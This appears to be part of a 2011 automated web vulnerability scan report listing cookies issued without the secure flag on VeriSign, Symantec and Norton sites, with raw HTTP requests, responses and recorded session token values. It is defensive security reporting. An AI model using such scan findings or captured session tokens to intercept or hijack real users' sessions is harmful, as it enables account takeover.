https://trust-center.verisign.com/rcm/verisign/scripts/syscheck.js
https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDK.js
https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js
https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_capture_payment.js
https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_product_selector.js
https://trust-center.verisign.com/rcm/verisign/scripts/utility.js
https://trust-center.verisign.com/rcm/verisign/style/brand.css
https://trust-center.verisign.com/rcm/verisign/style/capture_payment.css
https://trust-center.verisign.com/rcm/verisign/style/minimal_form.css
https://trust-center.verisign.com/rcm/verisign/style/module.css
https://trust-center.verisign.com/rcm/verisign/style/product_selector.css
https://trust-center.verisign.com/rcm/verisign/style/vrsn.css
https://www.verisign.com/assets/visual-sciences/vip/zig.js
https://www4.symantec.com/Vrt/wl

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

6.1. https://admin.instantservice.com/Customer previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://admin.instantservice.com
Path:	/Customer

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=9A45BF0A3BE120A9EF79A1A51006FFFF; Path=/isservices

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Customer HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:36:51 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: JSESSIONID=9A45BF0A3BE120A9EF79A1A51006FFFF; Path=/isservices
Location: https://admin.instantservice.com/customerclient_error.html?null
Content-Length: 0
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8

6.2. https://admin.instantservice.com/links/5851/14753 previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://admin.instantservice.com
Path:	/links/5851/14753

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=44FE3736608A2C17EACC6E31AB906A9B; Path=/isservices

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /links/5851/14753 HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:49 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: JSESSIONID=44FE3736608A2C17EACC6E31AB906A9B; Path=/isservices
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: User-Agent,Accept-Encoding
Content-Length: 5905
Connection: close
Content-Type: text/html;charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>VRSN Sales U
...[SNIP]...

6.3. https://admin.instantservice.com/links/5851/16144 previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://admin.instantservice.com
Path:	/links/5851/16144

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=0B3AF203D82136BD07783C04277FEF66; Path=/isservices

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /links/5851/16144 HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:50 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0B3AF203D82136BD07783C04277FEF66; Path=/isservices
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: User-Agent,Accept-Encoding
Content-Length: 5858
Connection: close
Content-Type: text/html;charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>VRSN Sales A
...[SNIP]...

6.4. https://admin.instantservice.com/links/5851/16145 previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://admin.instantservice.com
Path:	/links/5851/16145

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=13A178978A8AF485E01EA735265A1159; Path=/isservices

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /links/5851/16145 HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:50 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: JSESSIONID=13A178978A8AF485E01EA735265A1159; Path=/isservices
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: User-Agent,Accept-Encoding
Content-Length: 5853
Connection: close
Content-Type: text/html;charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>VRSN Sales A
...[SNIP]...

6.5. https://admin.instantservice.com/links/5851/39897 previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://admin.instantservice.com
Path:	/links/5851/39897

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=A931592882D97BC2DB5C2B6F4668C8C6; Path=/isservices

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /links/5851/39897 HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:50 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: JSESSIONID=A931592882D97BC2DB5C2B6F4668C8C6; Path=/isservices
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: User-Agent,Accept-Encoding
Content-Length: 5946
Connection: close
Content-Type: text/html;charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>VRSN Sales U
...[SNIP]...

6.6. https://onlinefamily.norton.com/familysafety/loginStart.fs previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://onlinefamily.norton.com
Path:	/familysafety/loginStart.fs

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=C487A83A71391D525794280EAF628915; Path=/familysafety
formVersion=1315604755623; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /familysafety/loginStart.fs?inid=us_2010June_NOF HTTP/1.1
Host: onlinefamily.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.7. https://securitycenter.verisign.com/celp/enroll/outsideSearch previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://securitycenter.verisign.com
Path:	/celp/enroll/outsideSearch

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=OqJ57BcEDySGMZg17yokdHt03FquFgyYGEezg44I0uZ1diTyCIN7!-1800460983; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /celp/enroll/outsideSearch HTTP/1.1
Host: securitycenter.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:46:33 GMT
Content-length: 408
Content-type: text/html
Last-Modified: Mon, 12 Jan 2004 23:04:38 GMT
Set-Cookie: JSESSIONID=OqJ57BcEDySGMZg17yokdHt03FquFgyYGEezg44I0uZ1diTyCIN7!-1800460983; path=/
Accept-Ranges: bytes
Connection: close

<html>
<head>
<title>VeriSign Retail</title>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
</head>
<body bgcolor="#ffffff">

<h1>System Unavailable</h1>

...[SNIP]...

6.8. https://securitycenter.verisign.com/celp/enroll/retail previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://securitycenter.verisign.com
Path:	/celp/enroll/retail

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=OqIZWIQD33u9AZA3Ap2HnemKDA9cEWwlrgBQZ31zh5e1fWNs3qL2!-1800460983; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /celp/enroll/retail;jsessionid=OqE0Tm00XOqZIfwiE7FczMWMMOkVjg1izXQLLDKjlcyrNzI8OY4a!-1800460983 HTTP/1.1
Host: securitycenter.verisign.com
Connection: keep-alive
Referer: http://www.verisign.com/code-signing/index.html?tid=a_box
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=OqE0Tm00XOqZIfwiE7FczMWMMOkVjg1izXQLLDKjlcyrNzI8OY4a!-1800460983

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:43:53 GMT
Content-length: 408
Content-type: text/html
Last-Modified: Mon, 12 Jan 2004 23:04:38 GMT
Set-Cookie: JSESSIONID=OqIZWIQD33u9AZA3Ap2HnemKDA9cEWwlrgBQZ31zh5e1fWNs3qL2!-1800460983; path=/
Accept-Ranges: bytes

<html>
<head>
<title>VeriSign Retail</title>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
</head>
<body bgcolor="#ffffff">

<h1>System Unavailable</h1>

...[SNIP]...

6.9. https://securitycenter.verisign.com/celp/enroll/upsell previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://securitycenter.verisign.com
Path:	/celp/enroll/upsell

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=OqE10CQDoczcE12dL3a6BYK7SmniMvBhWXtc1NQr68hhq3LGOaAg!-1800460983; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /celp/enroll/upsell?application_locale=VRSN_US&originator=VeriSign:CELP&bundle_id=MSIECS002 HTTP/1.1
Host: securitycenter.verisign.com
Connection: keep-alive
Referer: http://www.verisign.com/code-signing/index.html?tid=a_box
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:27:18 GMT
Content-type: text/html;charset=UTF-8
Location: https://securitycenter.verisign.com/celp/enroll/retail
Set-Cookie: JSESSIONID=OqE10CQDoczcE12dL3a6BYK7SmniMvBhWXtc1NQr68hhq3LGOaAg!-1800460983; path=/
Content-Length: 303

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://securitycenter.verisign.co
...[SNIP]...

6.10. https://onlinefamily.norton.com/familysafety/basicpremium.fs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlinefamily.norton.com
Path:	/familysafety/basicpremium.fs

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

formVersion=1315604730862; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /familysafety/basicpremium.fs HTTP/1.1
Host: onlinefamily.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:45:30 GMT
Server: Apache
Set-Cookie: user_pref_lang=eng; Expires=Thu, 08-Dec-2011 21:45:30 GMT; Path=/
Set-Cookie: formVersion=1315604730862; Path=/
Cache-Control: no-cache,no-store,must-revalidate,max-stale=0
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Vary: Accept-Encoding
Content-Length: 41316

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Web Moni
...[SNIP]...

6.11. https://renewals.symantec.com/renewals/application previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://renewals.symantec.com
Path:	/renewals/application

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621879623-New%7C1336357879623%3B%20event69%3Devent69%7C1336357879625%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/5

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:50 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store
Content-Length: 21436

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />

<!-- BEGIN
...[SNIP]...

6.12. https://ssl-certificate-center.verisign.ch/process/retail/console_login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ssl-certificate-center.verisign.ch
Path:	/process/retail/console_login

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=34B2B6D6DB2D10DB60D0D1C1D953344E; Path=/; Domain=.verisign.ch

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: ssl-certificate-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.13. https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ssl-certificate-center.verisign.ch
Path:	/process/retail/production_trial_initial

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=34FAB86EDB2D10DB68C5A5440567C536; Path=/; Domain=.verisign.ch

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/production_trial_initial?productType=HASGCServer&application_locale=VRSN_CH HTTP/1.1
Host: ssl-certificate-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:46:42 GMT
Server: Apache
Set-Cookie: TLTHID=34FAB86EDB2D10DB68C5A5440567C536; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://ssl-certificate-center.verisign.ch/process/retail/production_trial_product_selector?uid=fb69022a800687aee2281387e3be2beb&product=GHAPT001
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

6.14. https://ssl-certificate-center.verisign.com/process/retail/console_login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ssl-certificate-center.verisign.com
Path:	/process/retail/console_login

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=35539628DB2D10DB528F9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: ssl-certificate-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.15. https://ssl-certificate-center.verisign.com/process/retail/production_trial_initial previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ssl-certificate-center.verisign.com
Path:	/process/retail/production_trial_initial

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=35B1A6C8DB2D10DB52919F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/production_trial_initial HTTP/1.1
Host: ssl-certificate-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:46:44 GMT
Server: Apache
Set-Cookie: TLTHID=35B1A6C8DB2D10DB52919F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://ssl-certificate-center.verisign.com/process/retail/production_trial_product_selector?uid=21e134a09c6b802996d1066fe9c13ef5&product=GSPT001
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

6.16. https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ssl-certificate-center.verisign.com
Path:	/process/retail/trustseal_trial_initial

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=36315378DB2D10DB52939F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trustseal_trial_initial HTTP/1.1
Host: ssl-certificate-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:46:45 GMT
Server: Apache
Set-Cookie: TLTHID=36315378DB2D10DB52939F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_new_account?uid=9e535ad90e202dd2be1657e6ee2caf70&product=TRUSTSEALTRIAL
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

6.17. https://trust-center.verisign.ch/process/retail/console_login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.ch
Path:	/process/retail/console_login

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=37115F40DB2D10DB60DAD1C1D953344E; Path=/; Domain=.verisign.ch

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: trust-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.18. https://trust-center.verisign.ch/process/retail/trust_initial previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.ch
Path:	/process/retail/trust_initial

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=372B7DB2DB2D10DB60DBD1C1D953344E; Path=/; Domain=.verisign.ch

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trust_initial HTTP/1.1
Host: trust-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:46:46 GMT
Server: Apache
Set-Cookie: TLTHID=372B7DB2DB2D10DB60DBD1C1D953344E; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://trust-center.verisign.ch/process/retail/trust_product_selector?uid=2f451e38320cb4cf9a868171c06fe1c9&product=TRUSTSEAL001
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

6.19. https://trust-center.verisign.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=6B107EF0DB2A10DB6A8ACEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:45 GMT
Server: Apache
Set-Cookie: TLTHID=6B107EF0DB2A10DB6A8ACEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:07 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 4710
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/x-icon

...... ..........F... ......................h...............(...>...(... ...@....................................... ................. !....)...9.'&'.(*&.)*(.44-.=?8.BC?...U...]...a. d...i. .h...
...[SNIP]...

6.20. https://trust-center.verisign.com/process/retail/console_login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/console_login

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=383DEE10DB2D10DB49FEB1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.21. https://trust-center.verisign.com/process/retail/help_and_support previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/help_and_support

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=3B56F1FADB2D10DB4A1EB1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/help_and_support HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:53 GMT
Server: Apache
Set-Cookie: TLTHID=3B56F1FADB2D10DB4A1EB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 138732

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...

6.22. https://trust-center.verisign.com/process/retail/redirect previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/redirect

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=3F6ECAD8DB2D10DB52FC9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/redirect HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
